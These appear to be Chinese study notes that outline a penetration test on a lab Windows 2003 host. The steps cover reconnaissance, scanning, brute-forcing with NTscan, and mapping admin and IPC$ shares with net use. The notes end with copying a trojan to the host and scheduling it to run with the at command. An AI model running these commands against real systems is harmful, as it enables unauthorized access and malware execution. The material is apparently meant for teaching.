渗透基本流程

0、授权

1、信息收集：nslookup whois

2、扫描漏洞：namp =ip范围    端口  80（IIS，apache，什么网站）

　　　　　　　scanport

高级扫描：如IIS漏洞 

　　　　　　扫描网站漏洞（）

3、漏洞利用

4、提权（shell环境、最高权限）

5、想干啥干啥

 

手工测试端口号开放：

telnet IP地址  测试端口

445利用漏洞之一IPC￥：

net use 

net use f: \\10.1.1.2\share 123.com /user:administrator:把2003的share文件映射到本地的f盘，后面是2003的密码账户

net use:查看本地哪些盘是其它服务器映射过来的

net use f: /del:取消映射

net use f: \\10.1.1.2\c$ 密码 /user:用户:把对方的C盘映射到本地

net use f: \\10.1.1.2\ipc$ 密码 /user:用户

通过暴力破解获取对方服务器的密码：软件：NTscan

 

 

制作木马：copy植入木马

net time \\10.1.1.2

at \\10.1.1.2 11:11 "c:\木马程序"

等待